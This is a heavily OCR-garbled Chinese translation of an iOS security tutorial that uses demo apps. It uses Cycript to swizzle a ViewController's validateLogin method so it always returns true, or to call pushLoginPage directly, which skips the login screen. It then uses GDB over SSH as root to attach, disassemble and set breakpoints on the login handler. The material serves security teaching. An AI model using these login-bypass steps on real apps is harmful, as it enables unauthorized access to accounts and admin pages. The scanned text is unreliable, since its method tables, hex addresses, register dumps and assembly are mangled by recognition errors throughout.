ent:":0x31e8e5e5,defaultFirstResponder:0x31cd7431, shouldUseDefaultFirstResponder:0x31cd7435, shouldUseNextFirstResponder:0x31ccec39, shouldUseKeyWindowStack:0x31ccf725, window:0x3 
1d2cb01,"touchesBegan:withEvent:":0x31dd5141,"touchesMoved:withEvent:":0x31e0b0fd," touchesEnded:withEvent:":0x31dd7699," completeForwardingTouches:phase:event:":0x31cc6fc5,"motionB 
egan:withEvent:":0x31e9e5e1,"motionCancelled:withEvent:":0x31e98e5e9,"remoteControlReceivedWithEvent:":0x31e8e5ed, windowResignedKey:0x31dc9c31, windowBecameKey:0x31dc9c35, promoteD 
eepestDefaultFirstResponder:0x31cd7245,"gestureEnded:":0x31e9e5f9, containedInAbsoluteResponderChain:0x31d0a445," setFirstResponder:":0x31cb0c31," setIsSettingFirstResponder:":0x31 
cb0b61, isSettingFirstResponder:0x31cb0a41, firstResponder:0x31ccf6fd, becomeFirstResponderWhenPossible:0x31d2133d, responderForBecomeFirstResponder:0x3lccebad," containsResponder: 
"iBx3lccebbl, nextKeyResponder:0x31e9e681, previousKeyResponder:0x31e9e605, clearBecomeFirstResponderWhenCapable:0x31d4be71, nextFirstResponderIfAllowed:0x3lccebfl,becomeFirstRespo 
nder:0x3lcb07cd, isRootForKeyResponderCycle:0x31e9e6098, requiresKeyboardWhenFirstResponder:0x31cb150d,canBecomeFirstResponder:0x31ccf619,"mouseDown:" :0x31e98e5Bd, mouseDragged:" :0x3 
1e9e5d1,"mouseUp:":0x31e98e5cd,"gestureStarted:":0x31e9e5f5,"gestureChanged:":0x31e9e5fd," controlMouseDown:":0x31e9e725," controlMouseUp:":0x31e9e729," controlMouseDragged:":0x31e9 
e72d," isTransitioningFromView:":0x31dc9cal," controlTouchBegan:withEvent:":0x31cc7f71," controlTouchMoved:withEvent:":0x31df1651," controlTouchEnded:withEvent:":0x31cc92a9, become 
FirstResponder:0x31cbO0cld,isFirstResponder:0x31cb0e5d, resignFirstResponder:0x31ccf641,inputAccessoryView:Üx3lcb14b9,canResignFirstResponder:OÜx3lccebed,textInputView:0x311a37cd, ke 
yboardResponder:0x31cb158d, requiresKeyboardResetOnReload:0x31cb127d, becomeFirstResponderAndMakeVisible:0x31e9e791,inputView:0x31cb1429, deepestDefaultFirstResponder:0x31cd739d, b 
eginPinningInputViews:0x31de5d15, endPinningInputViews:0x31d8907d, editingDelegate:0x31dbB171, finishResignFirstResponder:0x31ccecd1,reloadInputViews:0x31cb0db5,"mouseEntered:" :0x3 
1e8e5d5,"mouseExited:":0x31e9e5d9,"mouseMoved:":0x31eBe5dd,"scrollWheel:":0x31e9e5f1, responderForEditing:0x31db814d,reloadInputViewsWithoutReset:0x31e9e649," targetForAction:withS 
ender:":0x31e9e731,nextFirstResponder:0x31ccec6d," deepestDefaultFirstResponderMatching:":0x31e9e7a1," completeForwardingTouches:phase:event:index:":0x31cc6fe9, isPinningInputViews 
:0x31d89021,"cy$toJSON: inContext:":0x422740c, cy$box:0x4224138,  cy$valueOfInContext:":0x422413c," cy$deleteProperty:":0x4224164," cy$setProperty:to:":0x422415c, "cy$getPropertyNames: in 
Context:":0x422416c,"cy$getProperty:inContext:":0x4237b80," cy$getProperty:":0x4224154," cyShasProperty:":0x422414c,cy$JSType:0x4224144," cy$toCYON:":0x422742c,"  setSnoopiWatchDog:": 
8x255931,becomeActive:0x36b41c3d,becomeInactive:0x36b41c41,"postNotificationWithDescription:":0x36b2d4dd,okToNotifyFromThisThread:0x36b3be61,"fromNotifySafeThreadPerformSelector:wi 
thObject:":0x36b2d449,allowSafePerformSelector:0x36b27aa9,disallowSafePerformSelector:0x36b32fd9,"fromNotifySafeThreadPostNotificationName:object:userInfo:":0x36b2d2d5," fromMainThr 
eadPostNotificationName:object:userInfo:":0x36b3be6d,selectionAffinity:0x31fa37c9, textSelectingContainer:0x31fa2e0d, unmarkText:0x31e01339," expandSelectionToStartOfWordsBeforeCar 
etSelection:":0x31fa0ab5," extendCurrentSelection:":0x31fa08fd, setCaretSelectionAtEndOfSelection:0x31fa0c25," moveToEndOfWord:withHistory:":0x31fal1b85," moveToEndOfLine:withHistor 
y:":0x3lfale65," moveRight:withHistory:":0x31fa2b81," moveToStartOfWord:withHistory:":0x31fa1909," moveToStartOfLine:withHistory:":0x3lfalce9," moveleft:withHistory:":0x3lfa2a8d," 
moveToEndOfParagraph:withHistory:":0x31fa2201," moveToEndOfDocument:withHistory:":0x31fa24c5," moveDown:withHistory:":0x31fa2831," moveToStartOfParagraph:withHistory:":0x31falfe9," 
.moveToStartO0fDocument:withHistory:":0x31fa2411," moveUp:withHistory:":0x31fa25d5, deleteByWord:0x3lfa0ca5, deleteToStartOfLine:0x31fa0d51, deleteToEndOfLine:0x31fa0eb9," setMarked 
Text:selectedRange:":0x31fa302d," rangeOfEnclosingWord:":0x31d98c4d, fullText:0x31fa0639, setGestureRecognizers:0x31fa2e11," characterInRelationToRangedSelection:":0x31dca835, char 
acterBeforeCaretSelection:0x31dc9fad, selectionAtWordStart:0x31fa06a5, wordContainingCaretSelection:0x311a0599," deleteBackwardAndNotify:":0x31fa31021," deleteForwardAndNotify:":0x3 
1fa1049," characterInRelationToCaretSelection:":0x31dc9fc1, isEmptySelection:0x31fa0821," moveCurrentSelection:":0x31fa09c5," lastRectForRange:":0x31fa1221," replaceCurrentWordWith 
Text:":0x31fallbl, rectContainingCaretSelection:0x31e51ab1, selectionAtDocumentStart:0x31f230741, characterAfterCaretSelection:0x31dca269," clampedpositionFromPosition:offset:":0x31 
decldd," nsrangeForTextRange:":0x31e51981, selectionAtDocumentEnd:0x31fa07b1," positionFromPosition:inDirection:offset:withAffinityDownstream:":0x31fa2c79," scrollRectToVisible:ani 
mated:":0x31fa31319, selectionAffinity:0x31fa2d19, fontForCaretSelection:0x31e4ed698, textColorForCaretSelection:0x31fal3fd, newPhraseBoundaryGestureRecognizer:0x31fa3155, selectable 
Text:0x31d98cb9," indexForTextPosition:":0x31e51al11, keyInput:0x31fa0535," setSelectedTextRange:withAffinityDownstream:":0x31fa2ca9," updateSelectionWithTextRange:withAffinityDowns 
tream:":0x31fal4b5," setHistory:withExtending:withAnchor:withAffinityDownstream:":0x31fa1735," setSelectionRangeWithHistory:":0x31fal4e5," phraseBoundaryGesture:":0x31fa3259, selec 
tionAsNSRange:0x31fa20539, hasMarkedTextOrRangedSelection:0x31fa0895, expandSelectionToStartOfWordBeforeCaretSelection:0x31fa0aal," rangeOfLineEnclosingPosition:":0x31fa131d," range 
OfParagraphEnclosingPosition:":0x31fa1361,. fullRange:0x31f213a5," findPleasingWordBoundaryFromPosition:":0x31dafdel, enableScrollingIfNecessary:0x3117b825, disableScrollingIfNecess 
ary:0x31f7b829,defaultAccessibilityTraits:0x31f3b431,isAccessibilityElementByDefault:0x31f3b445,isElementAccessibilityExposedToInterfaceBuilder:0x3113b449, accessibilityFinalize: 0x 





在 这 里 ， 我 们 关心 的 时 候 用 来 显示 登录 页 的 view controller * 341-2 3] 9o A IL 83,5 fr 7 
ViewController. 所 以 打印 出 这 个 VC 的 所 有 消息 
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cy# 

(validateLogin:0x63635,pushLoginPage:0x6376d," loginTapped:":0x634a9," login2Tapped:":0x634e9,  setPasswordTextField:":0x637bd,"setUsernameTextField:":0x63821,didReceiveM 
emoryWarning:0x633f1,viewDidLoad:0x63371,passwordTextField:0x637al,usernameTextField:0x63805,dealloc:0x63425,  snoopiCanBeDismissed:0x24dc79,  snoopiDismiss:0x24dc4d, 
.snoopildentifier:0x24d6651,  snoopiDisplayModal:0x24d1c9,  snoopiViewControllerIndex:0x24d355,  snoopiViewControllers:0x24d3d9,  snoopilnsideVisibleStack:0x24d2d1, sn 
oopilnsideKeyWindow:0x24d24d,"  snoopiFindViewControllerWithIdentifier:":0x24d4f9,"set  snoopiDisplayModal:":0x24d201,"set  snoopiViewControllerIndex:":0x24d38d,"set — 
snoopilnsideKeyWindow:":0x24d285,"set  snoopilnsideVisibleStack:":0x24d309,"  snoopiUpdateInformation:vcIndex:keyWindow:visibleStack:":0x24d691,  snoopiDismissHelper:90 
x24da4d,  snoopiHasChildViewControllers:0x24d4b1,"initWithCoder:":0x31e9169d, "encodeWithCoder:":0x31e91eld," setTitle:":0x31ceabd5,applicationWillSuspend:0x31d1e5c1," t 
ryBecomeRootViewControllerlInWindow:":0x31cf0039,nextResponder:0x31d0a46d,interfaceOrientation:0x31d20fe1,view:0x31ce5be5,"setView:":0x31cea925,applicationDidResume:0x3 
1d89185,defaultFirstResponder:0x31d0a7e9, executeAfterAppearanceBlock:0x31d1b4al,awakeFromNib:0x31e981ce9,wantsFullScreenLayout:0x31ce5f69," preferredInterfaceOrientati 
onGivenCurrentOÜrientation:":0x31d2114d, lastKnownInterfaceOrientation:0x3lcefbed,isViewLoaded:0x3lceee3d,"setDisableRootPromotion:":0x31e94c71, isPresentedModally:0x31 
e4cf99,"shouldWindowUseO0nePartInterfaceRotationAnimation:":0x31cf0801,viewControllerForRotation:0x31cf022d, window:shouldAutorotateToInterfaceO0rientation:":0x31cf092d, 
.isViewControllerlInWindowHierarchy:0x31ela08d," updateLastKnownInterfaceO0rientationOnPresentionStack:":0x31e21fad," window:willRotateToInterfaceO0rientation:duration:":0 
x31e2ba91,"window:willAnimateFirstHalfOfRotationToInterfaceOrientation:duration:":0x31e956e1,"window:willAnimateRotationToInterfaceO0rientation:duration:":0x31e2e6ed,"w 
indow:didAnimateFirstHalfOfRotationToInterfaceO0rientation:":0x31e958b1," window:willAnimateSecondHalfOfRotationFromInterfaceOrientation:duration:":0x31e958e1,"window:di 
dRotateFromInterfaceO0rientation:":0x31e2ff71," window:willAnimateFromContentFrame:toContentFrame:":0x31e92669,isInWillRotateCallback:0x31cf014d,"rotatingContentViewForW 
indow:":0x31cf0161, firstResponder:0x31d80a8515, appearanceContainer:0x31e922a9,automaticallyForwardAppearanceAndRotationMethodsToChildViewControllers:0x31cee529,parentV 
iewController:0x31cd9aa5, appearState:0x3lceec6d, existingView:0x31ce55ad,inExplicitAppearanceTransition:0x31cee759,isInAnimatedVCTransition:0x31cee901, parentModalVie 
wController:0x31cee915,isPerformingModalTransition:0x31cee925,"setInAnimatedVCTransition:":0x31cee939, " viewWillMoveToWindow:":0x31cee961,"beginAppearanceTransition:ani 
mated:":0x31d487f1,endAppearanceTransition:0x31d77c29, viewDidMoveToWindow:shouldAppearOrDisappear:":0x3lceefdl,viewWilllayoutSubviews:0x31cf1309,viewDidLayoutSubviews 
:8x31cf1380d,modalPresentationStyle:0x31d3b81d,title:0x31ceabS9d,navigationItem:0x31cd9bfO,isEditing:0x31dle6el,"setEditing:animated:":0x31ddSeb1,"setEditing:":0x31df4ce 
d,"durationForTransition:":0x31d46641,transitionViewShouldUseViewControllerCallbacks:0x31e946a9,"transitionViewDidComplete:fromView:toView:":0x31d46d39,"shouldAutorota 
teToInterfaceOrientation:":0x31e94ed5, popoverController:0x31cf00ed,contentSizeForViewInPopover:0x31d4134d, contentSizeForViewInPopoverView:0x31d4136d, setModallnPopove 
r:":0x31dda861,isModallnPopover:0x31e912b9, viewForContentInPopover:0x31e91311," setPopoverController:":0x31e93545,"setIsSheet:":0x31e934b1," setAllowsAutorotation:":0 
x31ce5599,"setFormSheetSize:":0x31ce55c5," didReceiveMemoryWarning:":0x31e93349,applicationWantsViewsToDisappear:0x31dlfbel,accessibilityLargeTextDidChange:0x316952361, 
.doCommonSetup:0x31ce5321, isPresentationContextByDefault:0x31ce56e9,"setDefinesPresentationContext:":0x31ce56ed,"initWithNibName:bundle:":0x31ce5271, shouldPersistVie 
wWhenCoding:0x31e91e19,autoresizeArchivedView:0x31e92759," doesSelfÜrAncestorPassPredicate:":0x31e92d29," populateArchivedChildViewControllers:":0x31e91d71, resignRoot 
ViewController:0x31d77235,forceUnloadView:0x31d4b929, removeFromParentViewController:0x3lelS9bed,"setChildModalViewController:":0x31dBe6f1,"setParentModalViewController: 
":0x31dB8e761,storyboard:0x31e95c39, loadView:0x31d6fc01,nibBundle:0x31e925ad,"setNibName:":0x31e985be1,"setNibBundle:":0x31e95c15,nibName:0x31d5971d," loadViewFromNibNam 
ed:bundle:":0x31e922d1, defaultInitialViewFrame:0x3lce5ef9,"unloadViewForced:":0x31d4b93d, canReloadView:0x31e143al,viewWillUnload:0x31e14415,"setSearchBarHidNavBar:": 
0x31e85abl,"setSearchDisplayController:":0x31e95a69,viewDidUnload:0x31e92611, visibleView:0x31cf0171, updateLayoutForStatusBarAndInterfaceOrientation:0x3lcefd95,mutabl 
eChildViewControllers:0x31ce5bd5,autoresizesArchivedViewToFullSize:0x31e9272d,storyboardSegueTemplates:0x31e95c6d," segueTemplateWithIdentifier:":0x31e927ed, existingN 
avigationItem:0x31d05211, existingTabBarItem:0x31d05241,"updateTitleForViewController:":0x31d052ad,childModalViewController:0x31cda7c1, parentViewController:0x31ceac7d 
,"setParentViewController:":0x31ceae85,"willMoveToParentViewController:":0x31ceae95," addChildViewController:":0x31ceadd9," removeChildViewController:":0x31d3b9f5,"did 
MoveToParentViewController:":0x3ld1b98eS8,"removeChildViewController:notifyDidMove:":0x31d3b999,definesPresentationContext:0x31dBe5e5," nonModalAncestorViewControllerSto 
pAtIsPresentationContext:":0x31d8e575, nonModalAncestorViewController:0x31d8fc71," modalPresenter:":0x31d8e4a9," ancestorViewControllerOfClass:allowModalParent:":0x31c 
d9a80d,"setContainmentSupport:":0x31d3fc4d,containmentSupport:0x31cee541,isSettingAppearState:0x31e22115,"viewWillAppear:":0x31ceec4d," viewDidAppear:":0x31d1b579, "viewW 
illDisappear:":0x31dl1fdl1,"viewDidDisappear:":0x31d1fe19,childViewControllersCount:0x31ceab79,childViewControllers:0x31cd9bcd," setAppearState:":0x31e929d5," setViewAp 
pearState:isAnimating:":0x3lceeb05,"setAfterAppearanceBlock:":0x3lceffe9,"  viewWillAppear:":0x3lceead9,"  viewWillDisappear:":0x3ldlfce5,"  viewDidAppear:":0x3ldlb4fd 
,". viewDidDisappear:":0x31d1fd9d," endAppearanceTransition:":0x31d48c7d,disableRootPromotion:0x31dB6cB1, didSelfOrAncestorBeginAppearanceTransition:0x31ceeaBD,present 
edViewController:0x31cda781, skipDefaultAppearStateCallbacks:0x31e220d5, shouldUseFullScreenLayout:0x31ce7189, isModalSheet:0x31dBe789,"setInterfaceO0rientation:":0x31c 
efbfd, description:0x31e92121," descriptionWithChildren:":0x31e930865,"purgeMemoryForReason:":0x31e9336d, existingView:0x31e92615,unloadViewIfReloadable:0x31e1438d, nonM 
odalParentViewController:0x31ceB801d,modalTransitionView:0x31d46df9,dropShadowView:0x31cf039d, isViewInWindowWithoutParentViewController:0x31d1fc51," shouldUseFullScree 
nLayoutInWindow:parentViewController:":0x31ce802d," shouldChildViewControllerUseFullScreenLayout:":0x31cef615, reallyWantsFullScreenLayout:0x31cee501,currentAction:0x3 


在 输出 的 顶部 ， 你 可 以 看 到 这 个 VC 的 一 些 方 法 





cy& ViewController.messages 









dealloc:8x63425, 


方法 validateLogin 看 起 来 很 有 趣 。 让 我 们 看 看 class-dump-z 输 出 的 关于 这 个 方法 的 信息 。 如 果 


你 对 class-dump-z 不 就 悉 ， 请 参看 本 系列 的 过 篇 文章 。 


..snoopiCanBeDismissed:0x24dc79,  snoopiDismiss:0x24dc4d, . 


下 面 就 是 我 们 从 class-dump-z 的 输出 中 找到 的 关于 ViewController 的 相关 信息 


@interface ViewController : UIViewControLLer 1 
@private 
UITextFieldx  passwordTextField; 
UITextFieldx  usernameTextField; 
} 
@property(retain, nonatomic) UITextField* passwordTextField; 
@property(retain, nonatomic) UITextField* usernameTextField; 
-(void)pushLoginPage; 
-(BOOL)validateLogin; 
-(void) Login?Tapped: (id) tapped; 
-(void) LoginTapped: (id) tapped; 
-(void)dealloc; 
-(void)didReceiveMemoryWarning; 
-(void)viewDidLoad; 
gend 


正如 我 们 看 到 的 ， 方 法 validateLogin 返 回 一 个 BOOL 类 型 值 。 从 这 我 们 可 以 推断 这 个 方法 验证 
用 户 的 用 户 名 和 审 码 是 否 正 确 ， 正 确 返 回 YES， 和 否则 返回 NO © ， 我 们 可 以 改变 
东 个 特定 消息 的 实现 。 让 我 们 来 实现 一 个 方法 让 它 总 是 返回 TRUE 。 


cy# ViewController.messages['validateLogin'] = function() {return true;} 
function () {return true;} 
cyt ii 


因此 ，R.H.S (Right Hand Side) x — javascript Zt > S ÆA wltrue » iE X1 3046 RAM 
用 的 登录 页 面 的 Login Method 1 。 
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Pod = 5:04 PM ® om 





Welcome, admin 


可 以 看 到 ， 认 证 成 功 ， 应 用 让 我 们 进入 管理 页 面 了 。 我 们 使 用 Cycript 执 行 了 method 
SWizzling， 绕 过 了 登录 框 。 


一 些 其 他 有 趣 的 事情 。 


现在 我 们 看 到 method swizzling 是 如 何 工 作 的 ， 去 了 解 下 绕 过 这 个 验证 的 其 他 方法 也 会 非常 有 
趣 。 从 class-dump-z 的 输出 结果 ， 我 们 可 以 看 到 一 旦 validateLogin 返 回 TRUE。 方 法 
pushLoginPage 就 会 被 调用 。 其 他 一 些 页 面 可 能 叫做 pushUserPage, 或 者 
pushLoginSuccessfulPage 等 等 。 我 们 不 必需 要 验证 一 定 要 是 TRUE。 我 们 可 以 自己 调用 这 个 
方法 。 


cy& [UTApp.keyWindow. rootViewController.visibleViewController pushLoginPage] 
cyt H 


为 这 是 个 实例 万 法 ， 我 们 通过 UlIApp.keyWindow.rootViewController.visibleViewController 


得 到 实例 。 请 注意 这 样 做 可 能 导致 crash， 因 为 后 续 被 bush 进 的 view controller 可 能 对 输入 的 
用 户 名 和 密码 有 依赖 。 如 果 你 想 挑 战 一 下 ， 不 妨 试 试 绕 过 Login Method 2 。 


a, oe 


ÈK 


/ 


本 文 我 们 学 习 了 如 何 利 用 Cycript 来 进行 method swizzling ° 


iOS 安全 Wiki 


本 文 原 文 是 iOS 应 用 程序 安全 (8)- 用 Cycript 进 行 Method Swizzling 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 
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本 文 将 使 用 的 GDB-Demo 例 子 程序 可 以 从 我 的 github 账 户 上 下 载 。 请 确保 在 你 的 设备 上 安装 和 


Di 
`- 
O 


现在 让 我 们 SSH 进 入 设备 。 


prateekgianchandaniéPrateeks-MacBook-Pro [~] 
ssh roote172.20.10.5 
roote172.20.18.5's password: 


Prateeks-iPod:~ root# B 





现在 我 们 开启 GDB， 然 后 让 GDB 在 应 用 开启 之 后 就 挂 钓 这 个 应 用 。 可 以 通过 命令 attach - 
waitfor Appname 来 完成 。 你 也 可 以 在 设备 上 运行 这 个 应 用 ， 然 后 用 attach 命 令 挂 钧 这 个 运行 
的 进程 ， 如 下 图 所 示 。 


(CLL) attach GDB-Demo. 508 


Attaching to process 508. 

Reading symbols for shared libraries . done 

Reading symbols for shared libraries warning: Could not find object file "/Users/prateekgianchandani/Library/Developer/Xcode/Deri ved 
Data/GDB-Demo-ekqgzzhtmz symccdmdxf jhkomhds/Bui Ld/Intermediates/GDB-Demo . build/Debug-iphoneos/GDB-Demo . bui Ld/0bjects -normal/armv7 /mai 
n.o" - no debug information available for "main.m". 


warning: Could not find object file "/Users/prateekgianchandani/Library/Developer/Xcode/Deri vedData/GDB-Demo-ekqgzzhtmz symccdmdxf jhk 
omhds/Build/Intermediates/GDB-Demo.build/Debug-iphoneos/GDB-Demo.build/Objects-normal/armv7/AppDelegate.o" - no debug information av 
ailable for "AppDelegate.m". 


warning: Could not find object file "/Users/prateekgianchandani/Library/Developer/Xcode/Deri vedData/GDB-Demo-ekqgzzhtmz symccdmdxf jhk 
omhds/Build/Intermediates/GDB-Demo.build/Debug-iphoneos/GDB-Demo.build/Objects-normal/armv7/ViewController.o" - no debug information 
available for "ViewController.m". 


warning: Could not find object file "/Applications/Xcode .app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/arc/liba 
rclite iphoneos.a(arclite.o)" - no debug information available for "arclite.m". 


Reading symbols for shared libraries + done 
0x35919004 in mach msg trap () 
Cgdb) |l 





一 旦 GDB 挂 钓 进 了 这 个 应 用 ， 你 会 注意 到 这 个 应 用 目前 是 在 暂停 状态 。 你 可 以 用 c 命令 让 这 
个 应 用 继续 执行 。 不 过 在 继续 MS ， 让 我 们 先 做 些 调查 。 和 任何 其 它 架 构 一 样 ，ARM 中 
的 内 存 也 被 分 为 寄存 颈 (register) ° b 器 都 是 32 位 的 (iOS 7 中 是 64 位 的 ) ， 
它们 的 目的 就 是 保存 和 相互 之 间 移 动 数据 。 你 可 以 使 用 info registers 命 令 来 查看 关于 这 
存 器 的 信息 。 


ro 268451845 
ri 117440518 
r2 
r3 
r4 
r5 Oxf fFFFFFF 
0x0 0 
0x2fee5ed0 
0x0 0 
Qx2576c0 2455232 
0x7000006 
Oxf FFFFFFF 
Oxffffffel 
Qx2fee5e94 
0x35919201 898732545 
0x35919004 898732036 
[0x40000010, n = 0x0, z = Ox1, c = 0x0, v = 0x0, q = 0x0, j = 0x0, ge = 0x0, e = 0x0, a = 0x0, i 
t = 0x0, mode = 0x10} {0x40000010,  n=0,z=1， c=90, v=98, q= 0, j = 0, ge=0e=0,a=0,i=0,f=0， 
mode = usr} 





请 注意 命令 并 没有 把 ARM 中 的 所 有 寄存 器 都 打印 出 来 。 要 打印 所 有 的 寄存 器 ， 使 用 info 
all- Sep 命令 。 


into all-registers 
268451845 


üx7/000006 117440518 


Bf FFFFFFF 

th ü 

Ox? feeSedd 

axe 8 

Oxz57oc8 2455232 

ax 7000000 117446518 

Oxf FFEfEEFEEF -1 

Oxfffff fel =31 

üx2fee5e9o4 804150932 

6x35919701 898732545 

0x35919004. 898732036 

[0x40000010, n = üx0, z = Bl c = 0x0, v = 0x0, q = 0x0, j = 0x0, ge = 0x0, = 0x6, 
t = 0x0, mode = 0x10} {0x49000010, n= ð, z= 1, c=0, v= 8, q= 0, j = 0, ge=0, € = 0, a= Q, i 
mode = usr} 
(raw Ox00000000) 
(raw 0x00000000) 
(raw 000000000) 
(raw 000000000) 
(raw Ox00000000) 
(raw üx00000000) 
(raw Oüx00000000) 
(raw x00000000) 
(raw Ox00000000) 
(raw 0x00000000) 
(raw üx00000000) 
(raw 000000000) 
(raw Ox00000000) 
(raw üx00000000) 


续 几 条 指令 的 一 些 汇编 信 
EZ 8g LR o i) to BS mains 


Phi 出 汇编 信息 ， 使 用 disassemble 或 者 disas 44 
o 我 们 通过 在 disas 命 令 后 面 提供 函数 名 称 来 导 
Kd 汇编 ， 使 用 命令 disas main » 4e FA » 


T m 


Cgdb) main 


Dump of seat ber code for function main: 


ror LU am 


üxODDe336c 
Oxbobes soe 
0x0ODe2370 
0x0DOe93372 
0x00ODe2374 
0x0ODe2378 
üx0DOe9337a 
üx0DOe937c 
üx00Be937e 
0x00069382 
0x00069386 
üxODDe9238a 
üx0DDe238c 
üx0DDe238e 
üx0DDe2392 
üx0DDe2390 
0x00069398 
0x000e939c 
8x000e93a0 


RAN A A Al A 
用 o 


maim: 
<main+2>: 
mainm: 
«maine»; 
<main+8>: 


<main+L2>: 
<main+14>: 
<main+16>: 
<main+18>: 
<main+22>: 
<main+26>: 
«main-38» : 
«mainr-32»: 
<main+34>: 
«mainr-38».: 
<main+42>: 
mainhs: 
<main+4é>: 
«main-52» ; 


刚 在 设备 上 安装 的 应 用 ， 可 以 看 到 只 


Push 


{r7, Lr} 

r7, Sp 

sp, $36 

rz, #0 

rz, $0 >: üxü 

rz, [sp, #32] 

rð, [sp, #28] 

rl, [sp, #24] 

@xeafc4 «dyld stub objc autoreleasePoolPush» 
rl, #7418 - @xlcfa 
rl, #0 ; Ox 

rl, pc 

rl, [ri, #0] 

rz, #9006 

rz, 70 +; Wh 

r2, pc 

r3, #9092 

rs, 70 ME Wh 

r3, pc 


一 个 要 


BR (输入 


) HP. Fe sg AG 85 fa] 3E 





iPod © 10:06 PM a = 





Login 


S60Gd0060 
z|x[c| v]s|w]v 


123 $ 





我 们 也 可 以 从 用 class-dump-z 对 这 个 应 用 导出 的 信息 中 找到 有 个 类 叫 ViewController 和 一 个 方 
法 叫做 -(void)loginButtonTapped:(id)tapped: 


&interface ViewController : UlViewController { 
@private 
UITextField* _usernameTextField; 
UITextField* . passwordTextField; 
} 
@property(retain, nonatomic) UITextField* passwordTextField; 


@property(retain, nonatomic) UITextField* usernameTextField; 
-(void).cxx destruct; 

-(void)loginButtonTapped: (id)tapped; 
-(void)didReceiveMemoryWarning; 

-(void)viewDidLoad; 

Pend 





使 用 GDB， 我 们 可 以 在 应 用 中 设置 断 点 。 只 需要 输入 要 断 下 来 的 方法 名 称 。 使 用 命令 b 
functionName。 你 也 可 以 提供 不 带 类 信息 的 方法 签名 ， 如 果 你 不 确定 的 话 ，GDB 会 咨询 你 想 
要 在 那个 类 上 设置 断 点 


(gdb) 
[80] cancel 
[1] all 


Non-debugging symbols: 
[2] -[UINavigationController viewDidAppear: ] 


E -[UIPageController viewDidAppear:] 

[4] -[UIReferencelibraryViewController viewDidAppear: ] 
[5] -[UISplitViewController viewDidAppear:] 

[6] -[UITabBarController viewDidAppear: ] 

[7] -[UITableViewController viewDidAppear:] 

y -[UIViewController viewDidAppear:] 

» 





请 注意 ， 实 例 方 法 前 组 都 带 有 一 个 "-"， 而 类 方法 前 缓 带 有 "+"， 如 下 图 所 示 。 例 如 ， 
sharedlnstance 是 一 个 类 方法 ， 方 法 一 个 单 例 类 的 共享 实例 。 


(Ib sharedInstance 
[8] cancel 
[1] all 


- Non-debugging symbols: 
ara -[ABFavoritesListManager sharedInstance] 
-[AVAudioSession sharedInstance] 

-[CPPowerAssertionManager sharedInstance] 
-[MCFormatterVendor sharedInstance] 
-[NSMachBootstrapServer sharedInstance] 
+[NSMessagePortNameServer sharedInstance] 
-[PCPersistentInterfaceManager sharedInstance] 
+[PEPServiceConfiguration sharedInstance] 
+[PLGatekeeperClient sharedInstance] 
-[5SLockdown sharedInstance] 
+[TISweepSource sharedInstance] 
-[TIUserDictionaryController sharedInstance] 
-[UIDictationController sharedInstance] 
-[UIDictationLandingView sharedInstance] 
-[UIDictationView sharedInstance] 
-[UIInputSwitcher sharedInstance] 
-[UIInputSwitcherView sharedInstance] 
-[UIKeyboardCache sharedInstance] 
-[UIKeyboardCandidateBar sharedInstance] 
-[UIKeyboardCandidateInline sharedInstance] 
-[UIKeyboardDictationMenu sharedInstance] 
-[UIKeyboardEmojiGraphics sharedInstance] 
-[UIKeyboardImpl sharedInstance] 
-[UIKeyboardOverlayManager sharedInstance] 
-[UIKeyboardSplitControlMenu sharedInstance] 
-[UIPeripheralHost sharedInstance] 
sharedInstance 





可 以 通过 命令 info breakpoints 看 到 所 有 的 断 点 。 


dinfo breakpoints 
Num Type Disp Enb Address What 


1  breakpoint keep y @x329b850e «-[CPPowerAssertionManager sharedInstance]+14> 
2 breakpoint keep y @x37c3654c <+[NSLeafProxy alloc]> 
Cgdb) 





通过 命令 delete 和 断 点 的 ID 就 可 以 删除 任何 断 点 。 


(gdb) delete 2 
(gdb) info breakpoints 
Num Type 


1 breakpoint 


(gdb) fj 


不 管 怎样 ， 先 给 方法 loginButtonTapped: 设置 一 个 断 点 。 


Disp Enb Address 
keep y — 68x329b858e <+[CPPowerAssertionManager sharedInstance]-14» 


What 


(N^ loginButtonTapped: 





Breakpoint 3 at 60xe985fe 


现在 我 们 可 以 用 命令 continue 或 者 c 让 应 用 重新 run 起 来 。 


(gdb) continue 





Continuing. 


现在 点 击 应 用 的 登录 按钮 。 这 样 就 会 触发 我 们 的 断 点 。 


m T e 


gdb) continue 
Continuing. 


Breakpoint 3, 8x600e95fe in -[ViewController loginButtonTapped:] () 


Cgdb) J 


我 们 可 以 用 disassemble 命 令 查 看 随后 的 一 些 汇编 信息 。 


Cgdb) | 


Dump of assembler code for function -[ViewController loginButtonTapped:]: 


0x000eS35f8 «-[ViewController 


«-[ViewController 
<-[ViewControLler 
<-[ViewControLler 


88 «-[ViewController 


? «-[ViewController 
| «-[ViewController 


«-[ViewController 
«-[ViewController 


8 «-[ViewController 


? «-[ViewController 


«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 


? «e-[ViewController 


«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 


| «-[ViewController 


32 «-[ViewController 


«-[ViewController 


b «-[ViewController 


loginButtonTapped: ]--& : 
loginButtonTapped: ]+2>: 
loginButtonTapped: ]+4>: 
loginButtonTapped: ]+6>: 
loginButtonTapped: ]+8>: 


loginButtonTapped: ]-16»: 
loginButtonTapped: ]+12>: 
loginButtonTapped: ]+16>: 
loginButtonTapped: ]+2@>: 
loginButtonTapped: ]+24>: 
loginButtonTapped: ]+26>: 
loginButtonTapped: ]+28>: 
loginButtonTapped: ]+32>: 
loginButtonTapped: ]+36>: 
loginButtonTapped: ]+38>: 
loginButtonTapped: ]+42>: 
loginButtonTapped: ]+46>: 
loginButtonTapped: ]+48>: 
loginButtonTapped: ]+5@>: 
loginButtonTapped: ]+52>: 
LoginButtonTapped: ]+54>: 
LoginButtonTapped: ]+56>: 
LoginButtonTapped: ]+58>: 
loginButtonTapped: ]--68» : 
loginButtonTapped: ]+62>: 


push 


{r7, Lr} 
r7, sp 

sp, #40 
ré, [sp, 


rl, [sp, #32] 


rü, re 


Oxeafdà «dyld stub objc retain» 
So772 
70 ; Ux 


rl. 
ril. 
rl, pc 

rl, [r1, 


836] 


#0] 


2, #8372 


;Wh 


pc 


$8610 


P C 


pes 
[sp, 
mrt. 
[r3, 

rü, r3 
[rð, 
[r2, 
，[sp ， 
rz 


要 在 任意 的 指令 前 面 下 断 点 ， 请 在 那个 指令 的 地 址 前 面 加 上 "*" 


(gdb) break *@x@00e96d4 


Breakpoint 4 at @xe96d4 





#28] 
